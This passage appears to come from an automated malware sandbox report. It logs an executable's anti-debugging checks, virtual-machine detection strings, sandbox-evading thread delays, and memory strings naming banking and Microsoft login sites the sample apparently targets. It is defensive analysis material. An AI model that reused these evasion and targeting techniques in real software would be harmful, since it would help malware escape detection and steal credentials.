                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeMemory allocated: 31B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeMemory allocated: 51B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeMemory allocated: 7990000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeMemory allocated: 8990000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeMemory allocated: 8B20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeMemory allocated: 9B20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C096E rdtsc 9_2_011C096E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3424Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3338Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeWindow / User API: threadDelayed 4044Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeWindow / User API: threadDelayed 5927Jump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeAPI coverage: 0.7 %
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeAPI coverage: 0.2 %
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe TID: 5640Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6680Thread sleep count: 3424 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4936Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4676Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4940Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4536Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe TID: 3456Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 6632Thread sleep count: 4044 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 6632Thread sleep time: -8088000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 6632Thread sleep count: 5927 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 6632Thread sleep time: -11854000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 7-6E2al6.17.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 7-6E2al6.17.drBinary or memory string: discord.comVMware20,11696494690f
                Source: 7-6E2al6.17.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: 7-6E2al6.17.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: 7-6E2al6.17.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 7-6E2al6.17.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 7-6E2al6.17.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: 7-6E2al6.17.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 7-6E2al6.17.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 7-6E2al6.17.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 7-6E2al6.17.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 7-6E2al6.17.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: 7-6E2al6.17.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: 7-6E2al6.17.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 7-6E2al6.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: 7-6E2al6.17.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: regini.exe, 00000011.00000002.2686703437.000000000339D000.00000004.00000020.00020000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000014.00000002.2687933047.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 7-6E2al6.17.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: firefox.exe, 00000016.00000002.2197462856.000002BCC59DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluu
                Source: 7-6E2al6.17.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 7-6E2al6.17.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: 7-6E2al6.17.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: zdDlscHlw.exe, 0000000A.00000002.1740402895.000000000145E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 7-6E2al6.17.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: 7-6E2al6.17.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: 7-6E2al6.17.drBinary or memory string: global block list test formVMware20,11696494690
                Source: 7-6E2al6.17.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: 7-6E2al6.17.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 7-6E2al6.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: 7-6E2al6.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: 7-6E2al6.17.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 7-6E2al6.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 7-6E2al6.17.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: 7-6E2al6.17.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C096E rdtsc 9_2_011C096E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_00417833 LdrLoadDll,9_2_00417833
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122E10E mov eax, dword ptr fs:[00000030h]9_2_0122E10E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122E10E mov ecx, dword ptr fs:[00000030h]9_2_0122E10E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122E10E mov eax, dword ptr fs:[00000030h]9_2_0122E10E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122E10E mov eax, dword ptr fs:[00000030h]9_2_0122E10E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122E10E mov ecx, dword ptr fs:[00000030h]9_2_0122E10E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122E10E mov eax, dword ptr fs:[00000030h]9_2_0122E10E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122E10E mov eax, dword ptr fs:[00000030h]9_2_0122E10E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122E10E mov ecx, dword ptr fs:[00000030h]9_2_0122E10E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122E10E mov eax, dword ptr fs:[00000030h]9_2_0122E10E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122E10E mov ecx, dword ptr fs:[00000030h]9_2_0122E10E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01240115 mov eax, dword ptr fs:[00000030h]9_2_01240115
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122A118 mov ecx, dword ptr fs:[00000030h]9_2_0122A118
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122A118 mov eax, dword ptr fs:[00000030h]9_2_0122A118
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122A118 mov eax, dword ptr fs:[00000030h]9_2_0122A118
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122A118 mov eax, dword ptr fs:[00000030h]9_2_0122A118
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B0124 mov eax, dword ptr fs:[00000030h]9_2_011B0124
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117C156 mov eax, dword ptr fs:[00000030h]9_2_0117C156
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01186154 mov eax, dword ptr fs:[00000030h]9_2_01186154
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01186154 mov eax, dword ptr fs:[00000030h]9_2_01186154
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01214144 mov eax, dword ptr fs:[00000030h]9_2_01214144
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01214144 mov eax, dword ptr fs:[00000030h]9_2_01214144
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01214144 mov ecx, dword ptr fs:[00000030h]9_2_01214144
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01214144 mov eax, dword ptr fs:[00000030h]9_2_01214144
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01214144 mov eax, dword ptr fs:[00000030h]9_2_01214144
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01218158 mov eax, dword ptr fs:[00000030h]9_2_01218158
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117A197 mov eax, dword ptr fs:[00000030h]9_2_0117A197
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117A197 mov eax, dword ptr fs:[00000030h]9_2_0117A197
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117A197 mov eax, dword ptr fs:[00000030h]9_2_0117A197
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C0185 mov eax, dword ptr fs:[00000030h]9_2_011C0185
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01224180 mov eax, dword ptr fs:[00000030h]9_2_01224180
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01224180 mov eax, dword ptr fs:[00000030h]9_2_01224180
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0123C188 mov eax, dword ptr fs:[00000030h]9_2_0123C188
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0123C188 mov eax, dword ptr fs:[00000030h]9_2_0123C188
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120019F mov eax, dword ptr fs:[00000030h]9_2_0120019F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120019F mov eax, dword ptr fs:[00000030h]9_2_0120019F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120019F mov eax, dword ptr fs:[00000030h]9_2_0120019F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120019F mov eax, dword ptr fs:[00000030h]9_2_0120019F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012561E5 mov eax, dword ptr fs:[00000030h]9_2_012561E5
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FE1D0 mov eax, dword ptr fs:[00000030h]9_2_011FE1D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FE1D0 mov eax, dword ptr fs:[00000030h]9_2_011FE1D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FE1D0 mov ecx, dword ptr fs:[00000030h]9_2_011FE1D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FE1D0 mov eax, dword ptr fs:[00000030h]9_2_011FE1D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FE1D0 mov eax, dword ptr fs:[00000030h]9_2_011FE1D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B01F8 mov eax, dword ptr fs:[00000030h]9_2_011B01F8
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012461C3 mov eax, dword ptr fs:[00000030h]9_2_012461C3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012461C3 mov eax, dword ptr fs:[00000030h]9_2_012461C3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119E016 mov eax, dword ptr fs:[00000030h]9_2_0119E016
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119E016 mov eax, dword ptr fs:[00000030h]9_2_0119E016
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119E016 mov eax, dword ptr fs:[00000030h]9_2_0119E016
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119E016 mov eax, dword ptr fs:[00000030h]9_2_0119E016
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01216030 mov eax, dword ptr fs:[00000030h]9_2_01216030
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01204000 mov ecx, dword ptr fs:[00000030h]9_2_01204000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01222000 mov eax, dword ptr fs:[00000030h]9_2_01222000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01222000 mov eax, dword ptr fs:[00000030h]9_2_01222000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01222000 mov eax, dword ptr fs:[00000030h]9_2_01222000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01222000 mov eax, dword ptr fs:[00000030h]9_2_01222000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01222000 mov eax, dword ptr fs:[00000030h]9_2_01222000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01222000 mov eax, dword ptr fs:[00000030h]9_2_01222000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01222000 mov eax, dword ptr fs:[00000030h]9_2_01222000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01222000 mov eax, dword ptr fs:[00000030h]9_2_01222000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117A020 mov eax, dword ptr fs:[00000030h]9_2_0117A020
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117C020 mov eax, dword ptr fs:[00000030h]9_2_0117C020
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01182050 mov eax, dword ptr fs:[00000030h]9_2_01182050
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AC073 mov eax, dword ptr fs:[00000030h]9_2_011AC073
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01206050 mov eax, dword ptr fs:[00000030h]9_2_01206050
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012180A8 mov eax, dword ptr fs:[00000030h]9_2_012180A8
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118208A mov eax, dword ptr fs:[00000030h]9_2_0118208A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012460B8 mov eax, dword ptr fs:[00000030h]9_2_012460B8
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012460B8 mov ecx, dword ptr fs:[00000030h]9_2_012460B8
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012060E0 mov eax, dword ptr fs:[00000030h]9_2_012060E0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117C0F0 mov eax, dword ptr fs:[00000030h]9_2_0117C0F0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C20F0 mov ecx, dword ptr fs:[00000030h]9_2_011C20F0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011880E9 mov eax, dword ptr fs:[00000030h]9_2_011880E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117A0E3 mov ecx, dword ptr fs:[00000030h]9_2_0117A0E3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012020DE mov eax, dword ptr fs:[00000030h]9_2_012020DE
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117C310 mov ecx, dword ptr fs:[00000030h]9_2_0117C310
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A0310 mov ecx, dword ptr fs:[00000030h]9_2_011A0310
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BA30B mov eax, dword ptr fs:[00000030h]9_2_011BA30B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BA30B mov eax, dword ptr fs:[00000030h]9_2_011BA30B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BA30B mov eax, dword ptr fs:[00000030h]9_2_011BA30B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122437C mov eax, dword ptr fs:[00000030h]9_2_0122437C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01228350 mov ecx, dword ptr fs:[00000030h]9_2_01228350
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124A352 mov eax, dword ptr fs:[00000030h]9_2_0124A352
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120035C mov eax, dword ptr fs:[00000030h]9_2_0120035C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120035C mov eax, dword ptr fs:[00000030h]9_2_0120035C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120035C mov eax, dword ptr fs:[00000030h]9_2_0120035C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120035C mov ecx, dword ptr fs:[00000030h]9_2_0120035C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120035C mov eax, dword ptr fs:[00000030h]9_2_0120035C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120035C mov eax, dword ptr fs:[00000030h]9_2_0120035C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01178397 mov eax, dword ptr fs:[00000030h]9_2_01178397
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01178397 mov eax, dword ptr fs:[00000030h]9_2_01178397
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01178397 mov eax, dword ptr fs:[00000030h]9_2_01178397
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A438F mov eax, dword ptr fs:[00000030h]9_2_011A438F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A438F mov eax, dword ptr fs:[00000030h]9_2_011A438F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117E388 mov eax, dword ptr fs:[00000030h]9_2_0117E388
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117E388 mov eax, dword ptr fs:[00000030h]9_2_0117E388
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117E388 mov eax, dword ptr fs:[00000030h]9_2_0117E388
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A3C0 mov eax, dword ptr fs:[00000030h]9_2_0118A3C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A3C0 mov eax, dword ptr fs:[00000030h]9_2_0118A3C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A3C0 mov eax, dword ptr fs:[00000030h]9_2_0118A3C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A3C0 mov eax, dword ptr fs:[00000030h]9_2_0118A3C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A3C0 mov eax, dword ptr fs:[00000030h]9_2_0118A3C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A3C0 mov eax, dword ptr fs:[00000030h]9_2_0118A3C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011883C0 mov eax, dword ptr fs:[00000030h]9_2_011883C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011883C0 mov eax, dword ptr fs:[00000030h]9_2_011883C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011883C0 mov eax, dword ptr fs:[00000030h]9_2_011883C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011883C0 mov eax, dword ptr fs:[00000030h]9_2_011883C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012063C0 mov eax, dword ptr fs:[00000030h]9_2_012063C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B63FF mov eax, dword ptr fs:[00000030h]9_2_011B63FF
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119E3F0 mov eax, dword ptr fs:[00000030h]9_2_0119E3F0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119E3F0 mov eax, dword ptr fs:[00000030h]9_2_0119E3F0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119E3F0 mov eax, dword ptr fs:[00000030h]9_2_0119E3F0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0123C3CD mov eax, dword ptr fs:[00000030h]9_2_0123C3CD
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011903E9 mov eax, dword ptr fs:[00000030h]9_2_011903E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011903E9 mov eax, dword ptr fs:[00000030h]9_2_011903E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011903E9 mov eax, dword ptr fs:[00000030h]9_2_011903E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011903E9 mov eax, dword ptr fs:[00000030h]9_2_011903E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011903E9 mov eax, dword ptr fs:[00000030h]9_2_011903E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011903E9 mov eax, dword ptr fs:[00000030h]9_2_011903E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011903E9 mov eax, dword ptr fs:[00000030h]9_2_011903E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011903E9 mov eax, dword ptr fs:[00000030h]9_2_011903E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012243D4 mov eax, dword ptr fs:[00000030h]9_2_012243D4
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012243D4 mov eax, dword ptr fs:[00000030h]9_2_012243D4
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122E3DB mov eax, dword ptr fs:[00000030h]9_2_0122E3DB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122E3DB mov eax, dword ptr fs:[00000030h]9_2_0122E3DB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122E3DB mov ecx, dword ptr fs:[00000030h]9_2_0122E3DB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122E3DB mov eax, dword ptr fs:[00000030h]9_2_0122E3DB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117823B mov eax, dword ptr fs:[00000030h]9_2_0117823B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01186259 mov eax, dword ptr fs:[00000030h]9_2_01186259
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117A250 mov eax, dword ptr fs:[00000030h]9_2_0117A250
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
